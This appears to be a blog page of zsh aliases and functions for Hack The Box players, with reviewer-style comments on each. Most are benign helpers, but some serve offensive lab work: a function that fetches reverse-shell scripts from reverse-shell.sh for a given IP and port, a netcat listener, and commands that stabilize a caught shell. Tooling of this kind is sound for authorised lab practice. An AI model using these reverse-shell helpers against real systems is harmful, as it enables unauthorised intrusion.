- To easily list files giving more information -
ll
# ll: long listing (-l) of every entry including dotfiles (-a), with
# human-readable sizes (-h) and a type indicator appended to names (-F).
alias ll="ls -alhF"
- First, install
xclip
in your system. This will let you copy output of a command directly to your clipboard. -cat file.txt|c
# c: copy stdin into the X11 CLIPBOARD selection (needs xclip), e.g. `cat file.txt | c`.
# The data stays in the clipboard until something overwrites it and can be read
# by other X clients, so do not leave secrets sitting there.
alias c="xclip -selection clipboard"
- Change the prompt of your shell. This helps you classify and recognize your terminal windows. You can change the colors according to your preference -
p dev01>
# p LABEL: replace the prompt with a short coloured one that shows LABEL.
#   $1 - text to display in the prompt (e.g. a host or engagement name)
# The %B / %F{...} / %{...%} sequences are zsh prompt escapes, so this is only
# meaningful in zsh. NOTE(review): $reset_color is not defined here; presumably
# it comes from zsh's colors support or oh-my-zsh - confirm.
# LABEL is embedded verbatim, so any '%' it contains is read as a prompt escape.
p() {
  local label="$1"
  PS1="%B%F{green}➜ %B%F{#03fcd0}% ${label} %{${reset_color}%}"
}
- Startup python SimpleHTTPServer -
server 8081
. Here if you want to start the server in a specific directory, you can pass the dir as an argument -server 9090 /tmp/
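# server [PORT] [DIR]: serve files over HTTP with Python's http.server.
#   $1 - TCP port; when omitted, http.server picks its own default port
#   $2 - optional directory to serve; the current directory is used otherwise
# http.server has no authentication and listens on all interfaces unless
# --bind is given, so everything under the served directory is readable by
# any host that can reach the port. Stop it as soon as the transfer is done.
server() {
  # ${1:+"$1"} drops the argument entirely when no port was given, and keeps
  # it as a single word otherwise; DIR is quoted so paths with spaces work.
  if [[ -n "$2" ]]; then
    python3 -m http.server ${1:+"$1"} --directory "$2"
  else
    python3 -m http.server ${1:+"$1"}
  fi
}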
- Generate a script with reverse shells to use. -
rs 10.10.14.28 9001 > shell.sh
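# rs HOST PORT: print the script that reverse-shell.sh returns for HOST:PORT.
#   $1 - address to embed in the request path
#   $2 - port to embed in the request path
# Output goes to stdout (the page redirects it into shell.sh).
# The body is generated by a third-party service at request time: read the
# saved file before using it, and do not assume two requests return the same
# content.
rs() {
  # --fail makes curl exit non-zero on an HTTP error instead of writing the
  # error page to stdout, where it would be saved as if it were the script.
  # The URL is quoted so the arguments cannot be split or globbed.
  curl --fail "https://reverse-shell.sh/$1:$2"
}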
- Connect to a VPN -
vpn-up
# vpn-up: restart the OpenVPN connection for the lab profile.
# Runs both steps through sudo. `pkill openvpn` signals every process whose
# name matches "openvpn", so any other tunnel that is up is dropped as well.
# NOTE(review): the .ovpn profile presumably carries the client key material;
# keep it readable by your own user only - confirm the file mode.
vpn-up() {
  local profile=/home/kavi/Documents/HTB/lab_kavigihan.ovpn

  sudo pkill openvpn
  sudo openvpn "$profile"
}
- Setup the env. (For HTB players). This will make a directory named after a name you specify and start a webserver
in
/opt/drop
directory. You can put your pspy
, linpeas.sh
and similar files there. The PID of the server is saved in /home/kavi/Documents/HTB/$1/.server.pid
in case you want to kill the server - htb-init Moderators
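# htb-init NAME: prepare a working directory for a box and start a file server.
#   $1 - box name; <root>/NAME/files and <root>/NAME/exploits are created
# Environment (both optional, defaults are the original hard-coded paths):
#   HTB_ROOT     - parent directory for boxes (default /home/kavi/Documents/HTB)
#   HTB_DROP_DIR - directory served on port 8080 (default /opt/drop)
# Side effects: starts `python3 -m http.server 8080` in the background with its
# output discarded, stores its PID in <root>/NAME/.server.pid, changes into
# <root>/NAME and clears the screen.
# Returns non-zero without starting anything when NAME is missing or the drop
# directory does not exist.
#
# The server has no authentication and listens on all interfaces, so every file
# under the drop directory is downloadable by any host that can reach port
# 8080. Stop it with: kill "$(cat <root>/NAME/.server.pid)"
htb-init() {
  local root="${HTB_ROOT:-/home/kavi/Documents/HTB}"
  local drop="${HTB_DROP_DIR:-/opt/drop}"
  local box

  if [[ -z "$1" ]]; then
    echo 'Usage: htb-init Moderators' >&2
    return 1
  fi
  box="$root/$1"

  # Previously a failed `cd /opt/drop` was ignored and the server then exposed
  # whatever directory the shell happened to be in. Refuse to start instead.
  if [[ ! -d "$drop" ]]; then
    printf 'htb-init: drop directory %s does not exist; web server not started\n' "$drop" >&2
    return 1
  fi

  mkdir -p -- "$box/files" "$box/exploits" || return 1

  # --directory pins the served tree explicitly rather than relying on cwd.
  python3 -m http.server 8080 --directory "$drop" > /dev/null 2>&1 &
  printf '%s\n' "$!" > "$box/.server.pid"

  cd -- "$box" || return 1
  clear
}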
- Doing a full nmap.
nmap-full 10.10.11.169
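# nmap-full TARGET: scan all TCP ports of TARGET with default scripts, version
# detection and nmap's -A bundle, with verbose output.
#   $1 - target as nmap accepts it (the page uses a single IP address)
# --min-rate=400 and --min-parallelism=512 force a fast, noisy scan: it is easy
# to spot in network monitoring and can overload fragile hosts, so keep it to
# lab ranges or systems you are explicitly authorised to test.
nmap-full() {
  # Quoted so the target is always passed as exactly one argument.
  nmap -p- -sC -sV -A --min-rate=400 --min-parallelism=512 -vv "$1"
}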
- Run
ffuf
for directory busting - ffuf-dir http://site.com/FUZZ
. If you want to specify extensions or any other option, you can pass them after the URL (ffuf-dir URL -e php -fl 100
)
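# ffuf-dir URL [FFUF_OPTIONS...]: content discovery with ffuf and dirb's big.txt.
#   $1  - URL containing the FUZZ keyword, e.g. http://site.com/FUZZ
#   $2+ - extra options handed to ffuf unchanged (e.g. -e php -fl 100)
ffuf-dir() {
  # "$1" and "${@:2}" are quoted so a URL with '?', '*' or '&' and option
  # values containing spaces (such as a header) reach ffuf as single words.
  ffuf -u "$1" -w /usr/share/wordlists/dirb/big.txt "${@:2}"
}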
- Run
ffuf
for vhost fuzzing -ffuf-vhost domain.local
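# ffuf-vhost DOMAIN [FFUF_OPTIONS...]: virtual-host discovery with ffuf.
#   $1  - base domain; requests go to http://DOMAIN with "Host: FUZZ.DOMAIN"
#   $2+ - extra options handed to ffuf unchanged
# Uses the SecLists subdomains-top1million-20000 wordlist and plain HTTP.
ffuf-vhost() {
  # Quoted so the domain and every extra option stay single arguments.
  ffuf -H "Host: FUZZ.$1" -u "http://$1" \
    -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt \
    "${@:2}"
}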
- Start feroxbuster for directory brute-forcing -
fx http://10.10.11.169
${@: 2};
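# fx URL [FEROXBUSTER_OPTIONS...]: content discovery with feroxbuster and the
# SecLists directory-list-2.3-small wordlist.
#   $1  - base URL to scan
#   $2+ - extra options handed to feroxbuster unchanged
# Extra arguments used to be dropped silently; they are now forwarded, the same
# way ffuf-dir and ffuf-vhost forward theirs.
fx() {
  # Quoted so the URL and every extra option stay single arguments.
  feroxbuster -u "$1" \
    -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt \
    "${@:2}"
}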
- Start a listener. This is especially for zsh users (especially
oh-my-zsh
). By default this will start the listener on port 9090, or you can specify the port you need: lst 9001
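# lst [PORT]: run `nc -lvnp PORT` inside a bash login shell.
#   $1 - TCP port to listen on; 9090 when omitted
# Returns 1 without starting anything if PORT is not purely numeric.
# NOTE(review): no source address is given, so nc is expected to accept
# connections on every interface from any peer - confirm for your netcat
# variant and close the listener when you are done with it.
lst() {
  local port="${1:-9090}"

  # The port used to be pasted into the string given to `bash -c`, so any
  # shell metacharacters in it were executed. Accept digits only, and hand the
  # value over as a positional parameter rather than as part of the command.
  case "$port" in
    *[!0-9]*)
      printf 'lst: port must be a number, got: %s\n' "$port" >&2
      return 1
      ;;
  esac

  bash --login -c 'nc -lvnp "$1"' lst "$port"
}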
- Stabilize the shell. This can be used in combination with the above listener.
# st [MODE]: put the PTY-upgrade commands on the clipboard, then switch the
# local terminal to raw mode and bring the backgrounded job to the foreground.
#   $1 - 1: use `python`; 2: use `python3`; anything else: use `script`
# The text is piped through `c`, the clipboard alias defined earlier on the
# page. It always ends with `export TERM=alacritty`.
# After `stty raw -echo` the local terminal stays in raw mode with echo off
# until it is reset, including when `fg` has no job to resume.
st() {
  local upgrade

  if [[ $1 -eq 1 ]]; then
    upgrade="python -c 'import pty;pty.spawn(\"/bin/bash\")'"
  elif [[ $1 -eq 2 ]]; then
    upgrade="python3 -c 'import pty;pty.spawn(\"/bin/bash\")'"
  else
    upgrade='script -q /dev/null -c /bin/bash'
  fi

  printf '%s\nexport TERM=alacritty\n' "$upgrade" | c
  echo "Stablizing commands copied to the clipboard!"

  stty raw -echo
  fg
}
I.e. once you get a connection to your listener, you can background it with Ctrl+z
and then issue st
to copy the stabilizing commands to your clipboard (the c
alias mentioned above is also used here). This will then issue the stty raw -echo;fg
command for you. Then you just have to paste the copied commands and press enter. And now you have a fully stabilized shell!
Another nice automated solution for stabilizing your reverse shell which works for both bash
and zsh
can be found here
- Url encode a string -
echo asd==|urlencode
# urlencode: percent-encode the text read from stdin and print it.
# Leading and trailing whitespace (including echo's newline) is stripped first.
# urllib.parse.quote leaves '/' unescaped by default, so path separators pass
# through unchanged.
urlencode() {
  python3 -c '
import sys
from urllib.parse import quote

text = sys.stdin.read().strip()
print(quote(text))
'
}
- URL decode a string -
echo 123%3D%3D|urldecode
# urldecode: decode percent-escapes in the text read from stdin and print it.
# Leading and trailing whitespace (including echo's newline) is stripped first.
# A single pass is made, so double-encoded input needs to be piped through twice.
urldecode() {
  python3 -c '
import sys
from urllib.parse import unquote

text = sys.stdin.read().strip()
print(unquote(text))
'
}
- Get the MD5 hash of a string -
echo kavi|md5
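# md5: print the hex MD5 digest of the string read from stdin.
# One trailing newline is removed before hashing, so `echo kavi | md5` hashes
# "kavi" rather than "kavi\n" (the newline echo appends used to be hashed too,
# which produced a digest that matched no other tool's MD5 of the string).
# Input is hashed as raw bytes, so it does not have to be valid text.
# MD5 is not collision resistant; use this to reproduce or compare existing
# hashes, not to protect anything.
md5() {
  python3 -c '
import hashlib
import sys

data = sys.stdin.buffer.read()
if data.endswith(b"\n"):
    data = data[:-1]
print(hashlib.md5(data).hexdigest())
'
}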
- The following are for tmux users. This will allow you to quickly add notes to the status bar of your tmux session. I.e. when you find a user password which you will be using a lot, you can add it here, instead of keeping it in the clipboard or noting it down in a file. -
tsa 'admin:pa$$10rd'
- this will add the note.tsd
- will clear the status bar
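# tsa NOTE: prepend NOTE to the right-hand side of the tmux status bar.
#   $1 - text to show
# Globals: TMUX_SATUS_BAR (read) - path of the file holding the current
#          status-right content; rewritten as "| NOTE <previous content>".
# Returns 1 if TMUX_SATUS_BAR is unset or empty.
#
# The note is stored in clear text in that file and displayed in every client
# attached to the tmux server, so a password placed here shows up in
# screenshots and screen shares; keep the file private to your user and clear
# the bar with tsd when finished.
# tmux expands #{...} and #(...) inside status-right, and #(...) runs a shell
# command, so a note containing '#' is interpreted rather than shown literally.
tsa() {
  local status_bar=''

  # With the variable unset, `cat` had no operand and blocked reading stdin.
  if [[ -z "$TMUX_SATUS_BAR" ]]; then
    echo 'tsa: TMUX_SATUS_BAR is not set' >&2
    return 1
  fi

  if [[ -f "$TMUX_SATUS_BAR" ]]; then
    status_bar=$(cat -- "$TMUX_SATUS_BAR")
  fi

  tmux set-option -g status-right "$1 $status_bar"
  # printf rather than echo: zsh's echo rewrites backslash sequences, which
  # would corrupt notes such as passwords containing '\'.
  printf '%s\n' "| $1 $status_bar" > "$TMUX_SATUS_BAR"
}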
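# tsd: clear the notes from the tmux status bar.
# Globals: TMUX_SATUS_BAR (read) - path of the file holding the status-right
#          content; it is overwritten with the default '[#{session_name}]'.
# Returns 1 if TMUX_SATUS_BAR is unset or empty, or if the file cannot be
# written.
# Overwriting the file also removes any note (for example a credential) that
# was stored in it in clear text.
tsd() {
  local status_bar

  # With the variable unset the redirection failed and `cat` blocked on stdin.
  if [[ -z "$TMUX_SATUS_BAR" ]]; then
    echo 'tsd: TMUX_SATUS_BAR is not set' >&2
    return 1
  fi

  printf '%s\n' '[#{session_name}]' > "$TMUX_SATUS_BAR" || return 1
  status_bar=$(cat -- "$TMUX_SATUS_BAR")
  tmux set-option -g status-right "$status_bar"
}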
NOTE: For this to work you need to have a variable called TMUX_SATUS_BAR
pointing to a file which contains the current config for the right side of your status bar. For me it's [#{session_name}]
. For more information, take a look at my .zshrc
If you have any other suggestions, let me know!